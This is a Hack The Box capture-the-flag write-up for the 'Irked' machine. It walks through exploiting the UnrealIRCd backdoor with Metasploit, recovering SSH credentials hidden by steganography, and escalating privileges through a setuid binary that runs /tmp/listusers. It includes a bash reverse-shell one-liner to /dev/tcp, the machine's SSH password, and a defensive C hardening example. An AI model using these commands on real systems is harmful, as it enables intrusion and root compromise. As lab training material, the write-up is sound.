Hack The Box - Irked


[Image: Irked machine banner]


Summary:


This machine highlighted a few issues: supply chain compromise, how easy it is to hide information with steganography, and how easily a vulnerable binary with the ‘sticky bit’ set can be abused.

| Gaining Access | Elevating Privileges |
|---|---|
| Backdoor in IRC service | Binary with Sticky bit set |
| Spawn a stable shell with Python | Insecure reference within binary |
| Backup file with stego password | Create malicious bash script |
| SSH credentials hidden in picture | |

Write-up

When starting this machine, I first checked whether a website was served over port 80. The main webpage mentioned an IRC service and also contained a picture.

http://10.10.10.117/

[Image: Irked webpage]

After saving the picture (you never know what will come in handy), I started a scan of common UDP ports and of all TCP ports, which I let run in the background.

nmap -sU -oA nmapUDP 10.10.10.117
nmap -p 1-65535 -oA nmapfull 10.10.10.117

This scan turned out to be unnecessary in the end; however, it is often worth running slower, comprehensive nmap scans while you perform other tasks, as they may reveal items of interest that would otherwise go unnoticed.

Whilst this was running, I looked into common IRC ports and found that port 6697 is commonly used for IRC services. Suspecting this might be the case here, I scanned it with nmap and found it to be open.

nmap -p 6697 10.10.10.117
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-28 11:07 ACST
Nmap scan report for 10.10.10.117
Host is up (0.34s latency).
PORT     STATE SERVICE
6697/tcp open  ircs-u

Backdoor in IRC Service

I suspected this to be the UnrealIRCd service, partly because of the box name ‘Irked’, so I checked Exploit-DB for any known exploits.

searchsploit ircd
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
DALnet Bahamut IRCd 4.6.5 - 'SUMMON' R | exploits/linux/remote/20043.c
FiSH-irssi 0.99 - Evil ircd Buffer Ove | exploits/linux/remote/17181.pl
Hybrid Ircd 5.0.3 p7 - Remote Buffer O | exploits/multiple/remote/19459.txt
IRCnet IRCD 2.10 - Local Buffer Overfl | exploits/linux/dos/23239.c
IrcDelphi Daemon Server - Denial of Se | exploits/windows/dos/14266.pl
SIRCD Server 0.5.2/0.5.3 - Operator Pr | exploits/multiple/remote/23396.txt
Snircd 1.3.4 - 'send_user_mode' Denial | exploits/multiple/dos/5306.txt
UnrealIRCd 3.2.8.1 - Backdoor Command  | exploits/linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configurati | exploits/windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader | exploits/linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Serv | exploits/windows/dos/27407.pl
ircd-hybrid 7.0.1 / ircd-ratbox 1.5.1/ | exploits/linux/dos/24222.c
ircd-hybrid 8.0.5 - Denial of Service  | exploits/linux/dos/24951.pl
methane IRCd 0.1.1 - Remote Format Str | exploits/linux/dos/22839.c
ngIRCd 0.6/0.7/0.8 - Remote Buffer Ove | exploits/linux/dos/25070.c
ngIRCd 0.8.1 - Remote Denial of Servic | exploits/linux/dos/789.c
ngIRCd 0.8.2 - Remote Format String    | exploits/linux/remote/784.c
--------------------------------------- ----------------------------------------

Given the exploit was a Ruby file, it was highly likely to be a Metasploit module; however, I went and confirmed this.

searchsploit -m 16922
head 16922.rb

As expected, it was the Metasploit module.

##
# $Id: unreal_ircd_3281_backdoor.rb 11227 2010-12-05 15:08:22Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/

What is interesting is that this references a ‘backdoor’ rather than a buffer overflow or any other kind of vulnerability. Looking at the file more closely provides some further context.

cat 16922.rb

'Name'           => 'UnrealIRCD 3.2.8.1 Backdoor Command Execution',
'Description'    => %q{
    This module exploits a malicious backdoor that was added to the
    Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the
    Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.

So although this is now over 9 years old, it shows that for over 6 months this software shipped with a planted backdoor that went unnoticed. This is another example of a supply chain compromise, which can lead to a security breach if software and its dependencies aren’t properly analysed.

Back to the exploitation: I ran the Metasploit module unreal_ircd_3281_backdoor against the UnrealIRCd service.

msfconsole
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RPORT 6697
set RHOST 10.10.10.117
exploit

Success: I now had a low-privilege reverse shell.

Spawn a stable shell with Python

To make sure I wouldn’t have to start over if my shell were to crash, I spawned a Meterpreter shell as a separate session.

use post/multi/manage/shell_to_meterpreter
set SESSION 1
exploit

From here I interacted with the newly created Meterpreter session and dropped into another shell, which I made interactive by spawning a TTY shell using Python.

This wasn’t strictly necessary, but it gave me backup sessions in case my shell crashed (which it did multiple times).

sessions -i 2
shell
python -c 'import pty; pty.spawn("/bin/sh")'

From here I examined the directory I had landed in and went searching for the user.txt file:

/home/ircd/Unreal3.2

Backup file with stego password

Moving up through the directories, I found another user under /home/:

/home/djmardov

ls -la Documents

user.txt

cat /Documents/user.txt 

core_channel_open: Operation failed: 1

At this point I knew I didn’t have enough access. Within the Documents folder there was also a hidden .backup file.

ls -la

-rw-r--r-- 1 djmardov djmardov 52 May 16  2018 .backup
-rw------- 1 djmardov djmardov 33 May 15  2018 user.txt

Viewing this file provided some clues.

cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

What was interesting is that it mentioned ‘steg’, an abbreviation of steganography. Given I had found only one unusual piece of media throughout my enumeration (the picture I downloaded from the main webpage), I figured it might be hiding something.

SSH credentials hidden in picture

Using the common steganography tool steghide, I extracted a file from the downloaded picture with the password I had just found.

steghide --extract -sf irked.jpg 
UPupDOWNdownLRlrBAbaSSss

wrote extracted data to "pass.txt".

Reading this file revealed a random-looking string that could well be a password.

cat pass.txt 

Kab6h+m+bbp2J:HG

I was then able to SSH into the server with the username previously found under /home/ and this password.

Gaining Access

ssh djmardov@10.10.10.117
Kab6h+m+bbp2J:HG
cd Documents
cat user.txt 

User.txt: 4a66a … 67a8e


Binary with Sticky bit set

Running a common ‘one-liner’, I then checked for binaries with the SUID bit set that I might be able to exploit. More information about this can be found in my Zipper write-up:

find / -perm -u=s -type f 2>/dev/null

/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
**/usr/bin/viewuser**
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

This revealed an unusual ‘viewuser’ binary, which isn’t commonly found on Linux distributions.

Running it provided some information.

viewuser
This application is being devloped to set and test user permissions
It is still being actively developed
(unknown) :0           2019-01-20 02:54 (:0)
djmardov pts/1        2019-01-20 03:38 (10.10.15.130)
sh: 1: /tmp/listusers: not found

Insecure reference within binary

As the error message shows, the binary tried to run a file at ‘/tmp/listusers’ which did not exist. Since /tmp is writable by every user, this was a perfect opportunity to escalate my privileges.

sh: 1: /tmp/listusers: not found

I created the file and set its permissions so that anyone could read, write and execute it.

touch /tmp/listusers
chmod 7777 /tmp/listusers

Create malicious bash script

Based on the mention of “sh”, I assumed this binary would execute whatever shell script I placed in this file, so I edited it with nano to make it print the contents of root.txt.

nano /tmp/listusers
#!/bin/bash
cat /root/root.txt

Elevating Privileges

After running the binary again, I had obtained what was required. At this stage I could execute any command as root, including an elevated reverse shell with the one-liner below.

#!/bin/bash
bash -i >& /dev/tcp/<myip>/8008 0>&1

root.txt: 8d8e9 … 2daf3
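To show the root cause of this escalation from the defender's side, here is an added C example. It is not the source of the machine's viewuser binary (which this write-up never shows); it reconstructs the pattern the error message implies, a setuid-root program passing a fixed path under /tmp to system(), and places a hardened version beside it. The hardened version opens the helper without following symlinks, checks the file it actually opened (owner root, regular, executable, not writable by group or others), drops the setuid privilege in the child and executes the verified descriptor with fexecve and a minimal environment. All function names, the root-owner policy and the temporary file created in the demo are my assumptions, not something from the page.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern, as inferred from the viewuser error message:
 * a setuid-root program hands a fixed path under /tmp to system().
 * system() runs "sh -c /tmp/listusers" with the effective uid (root),
 * so whoever creates that file gets their script run as root. */
int run_helper_insecure(void) {
    return system("/tmp/listusers");
}

/* Policy check on an already-opened helper file. The file must be a
 * regular file, owned by trusted_uid (root for a setuid-root program),
 * executable by its owner, and writable only by its owner. A file an
 * ordinary user created in /tmp fails the owner test; a root-owned
 * file that was chmod'ed 0777 fails the write test. */
int stat_is_trusted(const struct stat *st, uid_t trusted_uid) {
    if (!S_ISREG(st->st_mode)) return 0;
    if (st->st_uid != trusted_uid) return 0;
    if (!(st->st_mode & S_IXUSR)) return 0;
    if (st->st_mode & (S_IWGRP | S_IWOTH)) return 0;
    return 1;
}

/* Wrapper so the policy can be exercised on constructed stat data. */
int check_mode_uid(mode_t mode, uid_t uid) {
    struct stat st = {0};
    st.st_mode = mode;
    st.st_uid = uid;
    return stat_is_trusted(&st, 0);
}

/* Open the helper without following symlinks and check the file we
 * actually opened (fstat), so the check and the later exec refer to the
 * same inode rather than to a path an attacker could swap underneath us.
 * Returns an fd on success, -1 if the file is missing or untrusted.
 * No O_CLOEXEC: fexecve needs the fd open if the helper is a script. */
int open_trusted_helper(const char *path) {
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !stat_is_trusted(&st, 0)) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Hardened execution: verify the file, fork, permanently drop the
 * setuid privilege in the child, and exec the verified descriptor with
 * a minimal environment instead of going through the shell.
 * Returns the helper's exit status, or -1 if it was refused. */
int run_helper_hardened(const char *path) {
    int fd = open_trusted_helper(path);
    if (fd < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) { close(fd); return -1; }
    if (pid == 0) {
        /* Real uid/gid belong to the invoking user; making them the
         * effective ids discards root, so even a trusted helper runs
         * unprivileged. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0) _exit(126);
        char *const argv[] = {(char *)path, NULL};
        char *const envp[] = {"PATH=/usr/bin:/bin", NULL};
        fexecve(fd, argv, envp);
        _exit(127);
    }
    close(fd);
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Demo: a world-writable file created by the current user in /tmp
 * (constructed here, not taken from the machine) must be rejected.
 * Returns 1 if it was (wrongly) trusted, 0 if rejected. */
int demo_tmp_file_rejected(void) {
    char tmpl[] = "/tmp/listusers.XXXXXX";
    int fd = mkstemp(tmpl);
    if (fd < 0) return -1;
    fchmod(fd, 0777);
    close(fd);
    int trusted = open_trusted_helper(tmpl) >= 0;
    unlink(tmpl);
    return trusted;
}

int main(void) {
    printf("world-writable /tmp helper trusted? %d\n", demo_tmp_file_rejected());
    printf("hardened run of /tmp/listusers: %d\n", run_helper_hardened("/tmp/listusers"));
    return 0;
}
```

The check-then-exec split is deliberate: checking a path with stat() and then calling execve() on the same path leaves a race window, whereas fstat() and fexecve() on one descriptor do not. Dropping privileges before the exec is what removes the payoff even if the policy is somehow bypassed, which is why a setuid program should do both.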


Final Notes

At the time of writing, other HTB members had rated the machine elements as shown below. Feel free to reach out with any feedback, or let me know if this helped.

[Image: HTB machine rating heatmap]